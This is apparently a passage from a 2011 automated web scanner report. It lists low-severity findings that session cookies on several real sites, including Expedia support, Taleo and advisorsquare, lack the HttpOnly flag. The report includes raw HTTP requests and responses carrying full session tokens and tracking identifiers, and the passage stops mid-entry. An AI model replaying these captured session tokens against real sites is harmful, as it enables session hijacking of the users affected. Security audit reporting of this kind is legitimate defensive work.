Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_FLTFLEX_CALENDAR%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/daily/service/default.asp%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:40:08 GMT
Server: Apache
P3P: policyref="http://support.expedia.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=UylYLAJ2ASVTO1IiAjpSMVVmBAZQU1FsBnRfbAEhVixWJFYqBSMCOwd9ViINfwV2WnoDPQZ3AzgOKAI4VHVcfFAmDnMGNwgfViMEPwdFAyVTYFhIAnIBcFN2Ui4CNFIrVSEEM1BhUWwGYV8pAWBWb1ZrVnoFMwJHB3ZWdQ1oBSZaOgMXBjQDZQ5vAj5UdVwmUDIOOgZoCHtWNQRLB3IDc1MxWHwCIAE0U0VSZgI9UjZVKQRzUDdRMwZzX3IBYVZtViNWbAVFAjAHI1YyDTwFYFphAyUGLAMnDjkCFFRAXF1QBQ5zBjYIaFZlBGQHdwNkU3dYPQJBAUNTVVJXAnRSYVVnBDJQZFFxBmVfNgEmVjNWQlZ6BTMCNwdrVm4NfgVrWi0DYgYRAzcOLwJiVEdcOVBzDmQGQghsVjYEPAcyAyVTYFg4AncBYFNyUnQCdFJgVRUEZ1AgUTcGNl91AWRWZVZiVnoFMgJFBzdWMA0vBTFaPgM3Bi0DcQ5%2BAnVUMlxMUGYOcwY2CGhWagRiB2IDZFN3WD0CQQE2UyRSMgJnUjBVEAQyUHBRIAYzX0MBMlYlVjRWaQVzAmcHdFZyDS8FMFpMA3wGYQMwDjMCdVQyXE5QdA4rBigIfFZjBC8HOQMiUw5YIQJ2AWJTclJzAjhSPFU%2FBApQKlFJBjNfSQFzVlpWRVZmBXMCWAdsVmQNWwVVWmUDPQZlA2MOfQJtVDxcKlAr; path=/
Set-Cookie: supportsurvey=1; expires=Fri, 13-May-2011 22:40:09 GMT; path=/; domain=support.expedia.com
RNT-Time: D=289548 t=1304721608882225
RNT-Machine: 04
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89104


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightn
...[SNIP]...
18.21. http://support.expedia.com/ci/ajaxRequest/getReportData  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://support.expedia.com
Path:   /ci/ajaxRequest/getReportData

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ci/ajaxRequest/getReportData HTTP/1.1
Host: support.expedia.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/answers/list/
Origin: http://support.expedia.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; supportsurvey=1; MC1=GUID=cc3450d747f3e2d59e058691af6ba2d1; s1=`user=v.8,0,EX01208381BC$0E$F3203000$BD$2E$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$220$0D!50$97$8B$7DB$8A$D8$F42$82$AB$89$FB!e02000`135; p1=`accttype=v.2,3,1,EX01EF947B7C$D1$25$DD$0C$FD$A0Y$B3$7D8$95B$1C$91$5DIR$81$2Al$1C$86$5D$CDU$2Cv$7B$8A`tpid=v.1,1`gacct=v.1,1,215819729`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`196; COOKIECHECK=1; cp_session=UylTJ1AkVHBUPFUlBG5SBA5zVS1cWVRqBXdYa1R0B30AclQoUXcDOg50B3MAclMgUnJXaQd2VG8AJgU%2FV3ZRcQp8WyZRYAMUVSBTaFETBiBTYFNDUCBUJVRxVSkEMlIrDnpVYlxtVGkFYlguVDUHPgA9VHhRZwNGDn8HJABlU3BSMldDBzVUMgBhBTlXdlErCmhbb1E%2FA3BVNlMcUSQGdlMxU3dQclRhVEJVYQQ7UjYOclUiXDtUNgVwWHVUNAc8AHVUblERAzEOKgdjADFTNlJpV3EHLVRwADcFE1dDUVAKX1smUWEDY1VmUzNRIQZhU3dTNlATVBZUUlVQBHJSYQ48VWNcaFR0BWZYMVRzB2IAFFR4UWcDNg5iBz8Ac1M9UiVXNgcQVGAAIQVlV0RRNAopWzFRFQNnVTVTa1FkBiBTYFMzUCVUNVR1VXMEclJgDk5VNlwsVDIFNVhyVDEHNAA0VHhRZgNEDj4HYQAiU2dSNldjByxUJgBwBXJXMVFBCjxbJlFhA2NVaVM1UTQGYVN3UzZQE1RjVCNVNQRhUjAOS1VjXHxUJQUwWERUZwd0AGJUa1EnA2YOfQcjACJTZlJEVygHYFRnAD0FclcxUUMKLlt%2BUX8Dd1VgU3hRbwYnUw5TKlAkVDdUdVV0BD5SPA5kVVtcJlRMBTBYTlQmBwsAE1RlUWADVg48BzoAdlMAUkdXdQdkVDQAcwVqVz9RJwpx; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DFAQ%25252520Support%2525253ASearch%25252520Results%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//support.expedia.com/euf/assets/images/go_btn.gif%252526ot%25253DIMAGE%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 1595

filters=%7B%22recordKeywordSearch%22%3Atrue%2C%22searchType%22%3A%7B%22filters%22%3A%7B%22rnSearchType%22%3A%22searchType%22%2C%22fltr_id%22%3A5%2C%22data%22%3A5%2C%22oper_id%22%3A1%2C%22report_id%22%
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:48:58 GMT
Server: Apache
P3P: policyref="http://support.expedia.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=AHpRJVAkU3cBaVQkBmwIXlIvA3tUUQI8BnQKOVR0BnwAclQoCy0AOQR%2BWS0MflEiW3sFOwV0BT4GIAw2XXxUdFAmWCUCMwQTAXRUbwFDBCIAM1FBUCBTIgEkVCgGMAhxUiYDNFRlAj8GYQp8VDUGPwA9VHgLPQBFBHVZegxpUXJbOwURBTcFYwZnDDBdfFQuUDJYbAJsBHcBYlQbAXQEdABiUXVQclNmARdUYAY5CGxSLgN0VDMCYAZzCidUNAY9AHVUbgtLADIEIFk9DD1RNFtgBSMFLwUhBjEMGl1JVFVQBVglAjIEZAEyVDQBcQRjACRRNFATUxEBB1RRBnAIO1JgAzVUYAIiBmUKY1RzBmMAFFR4Cz0ANQRoWWEMf1E%2FWywFZAUSBTEGJwxsXU5UMVBzWDICRgRgAWFUbAE0BCIAM1ExUCVTMgEgVHIGcAg6UhIDYFQkAmQGNgogVDEGNQA0VHgLPABHBDRZPwwuUWVbPwUxBS4FdwZ2DHtdO1REUGZYJQIyBGQBPVQyAWQEYwAkUTRQE1NkAXZUNAZjCGpSFwM1VHQCcwYzChZUZwZ1AGJUawt9AGUEd1l9DC5RZFtNBXoFYgU2BjsMe107VEZQdFh9AiwEcAE0VH8BPwQlAF1RKFAkUzABIFR1BjwIZlI4Aw1ULgIaBjMKHFQmBgoAE1RlCzoAVQQ2WWQMelECW04FJwVmBWUGdQxjXTVUIlAr; path=/
RNT-Time: D=157897 t=1304736538438344
RNT-Machine: 01
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1532

{"data":[["<span style=\"color:#008000\">Updated<\/span>","<a href=\"\/app\/answers\/detail\/a_id\/3823\">What is the Expedia Credit Card Guarantee?<\/a>","Your credit card is protected whenever you m
...[SNIP]...
18.22. https://support.trust-guard.com/visitor/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /visitor/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0 HTTP/1.1
Host: support.trust-guard.com
Connection: keep-alive
Referer: https://www.trust-guard.com/compare-Trust-Seals-s/1.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:49:42 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Cache-Control: max-age=3600, must-revalidate
Expires: Sun, 08 May 2011 00:49:42 GMT
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Set-Cookie: SWIFT_sessionid80=dxzxxi50ag628l80x5yuzob4lbj3yre8; path=/
Set-Cookie: SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; path=/
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/javascript
Content-Length: 11601

//===============================
// Kayako LiveResponse
// Copyright (c) 2001-2011
// http://www.kayako.com
// License: http://www.kayako.com/license.txt
//===============================

var sessio
...[SNIP]...
18.23. http://t2.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t2.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.lbmctech.com/&i=18511 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.lbmctech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538; loop=http%3A%2F%2Fwww%2Esilvon%2Ecom%2FSUPPLY%5FCHAIN%5FANALYSIS%2F%3F636%5Frm%5Fid%3D2%2E3294449%2E7%26gclid%3DCIjDhurP06gCFQbe4AodO2AOgw

Response

HTTP/1.1 302 Object moved
Date: Sat, 07 May 2011 01:31:35 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Elbmctech%2Ecom%2F; expires=Sat, 07-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSATCSRDS=ABIDHHLBAACNOIKLOOLPBJMM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>
18.24. http://t3.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t3.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.secureworks.com/compliance/comp/pci.html%3F_kk%3D6713825b-9989-43cb-8a7b-5c5635138b40%26_kt%3D6426467207%26gclid%3DCMm21t3V1KgCFcPd4AodU3_CiA&i=12419 HTTP/1.1
Host: t3.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.secureworks.com/compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sat, 07 May 2011 01:22:26 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t3.trackalyzer.com/0.gif
Content-Length: 152
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Esecureworks%2Ecom%2Fcompliance%2Fcomp%2Fpci%2Ehtml%3F%5Fkk%3D6713825b%2D9989%2D43cb%2D8a7b%2D5c5635138b40%26%5Fkt%3D6426467207%26gclid%3DCMm21t3V1KgCFcPd4AodU3%5FCiA; expires=Sat, 07-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACBRACQQ=BFOEGJNCOHLHFLBHOIMPBOLN; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t3.trackalyzer.com/0.gif">here</a>.</body>
18.25. http://tbe.taleo.net/NA9/ats/careers/jobSearch.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tbe.taleo.net
Path:   /NA9/ats/careers/jobSearch.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NA9/ats/careers/jobSearch.jsp?org=BT&cws=1&__utma=1.2052460901.1304724283.1304724283.1304724283.1&__utmb=1.1.10.1304724283&__utmc=1&__utmx=-&__utmz=1.1304724283.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)&__utmv=-&__utmk=178642980 HTTP/1.1
Host: tbe.taleo.net
Proxy-Connection: keep-alive
Referer: http://www.btamericascareers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:24:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=69BC8F52CA8219FC1D3E62420D8128B6.NA9_primary_jvm; Path=/NA9/ats
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Content-Length: 27234


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!DOCTYPE html PUBLIC "-//W3C//DTD XHT
...[SNIP]...
18.26. http://visible.me/search/social/follow/2563692  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://visible.me
Path:   /search/social/follow/2563692

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/social/follow/2563692 HTTP/1.1
Host: visible.me
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 06 May 2011 17:39:06 GMT
Set-Cookie: JSESSIONID=09C58878CD936100D6240D5E25B5D1A6; Domain=.visible.me; Path=/
Location: http://visible.me/social_follow_2563692
Connection: close
Set-Cookie: abTest="{}"; Version=1; Domain=.visible.me; Max-Age=2147483647; Expires=Wed, 24-May-2079 20:53:13 GMT; Path=/
Content-Length: 0
Content-Type: text/plain; charset=UTF-8

18.27. http://www.advancedaccess.com/swf/swfobject.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advancedaccess.com
Path:   /swf/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /swf/swfobject.js HTTP/1.1
Host: www.advancedaccess.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=157889130.; __utmxx=157889130.; __utmx_k_251695440=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 18:39:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQCTRCCR=MPAAIBGAIMAIDFIHHJCBFNKP; path=/
Cache-control: private
Content-Length: 19690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Real Estate Website Design, Internet Marketing - Advanced
...[SNIP]...
18.28. http://www.advisorsquare.com/advdev/calculators/content.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /advdev/calculators/content.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advdev/calculators/content.asp?contentid=2016389142 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=LEIHGKOBOMLIGAINHHKCOKOG; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:48:46 GMT

18.29. http://www.advisorsquare.com/design_gallery/Flash/BB12_bg.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/Flash/BB12_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/Flash/BB12_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=JAAHGKOBCMLHCCAJLLOJEPFK; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:28:31 GMT

18.30. http://www.advisorsquare.com/design_gallery/Flash/BU13Flash_banner_background.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/Flash/BU13Flash_banner_background.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/Flash/BU13Flash_banner_background.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=BNPGGKOBLLJEBHLOAHCLMIIF; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:27:52 GMT

18.31. http://www.advisorsquare.com/design_gallery/Flash/BU14Flash_banner_background.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/Flash/BU14Flash_banner_background.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/Flash/BU14Flash_banner_background.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=CNPGGKOBDPALCCFLHOOAEGMI; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:27:52 GMT

18.32. http://www.advisorsquare.com/design_gallery/Flash/BUP18Flash_banner_background.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/Flash/BUP18Flash_banner_background.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/Flash/BUP18Flash_banner_background.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=CMPGGKOBBDIJFCLAMNNOFGHP; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:27:38 GMT

18.33. http://www.advisorsquare.com/design_gallery/Flash/CS15Flash_banner_background.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/Flash/CS15Flash_banner_background.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/Flash/CS15Flash_banner_background.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=GMPGGKOBFPDLDODBBABBOHLC; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:27:42 GMT

18.34. http://www.advisorsquare.com/design_gallery/Flash/CS18_bg.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/Flash/CS18_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/Flash/CS18_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=LMPGGKOBKNLECPHGHPDNABKD; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:27:46 GMT

18.35. http://www.advisorsquare.com/design_gallery/Flash/CS20_bg.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/Flash/CS20_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

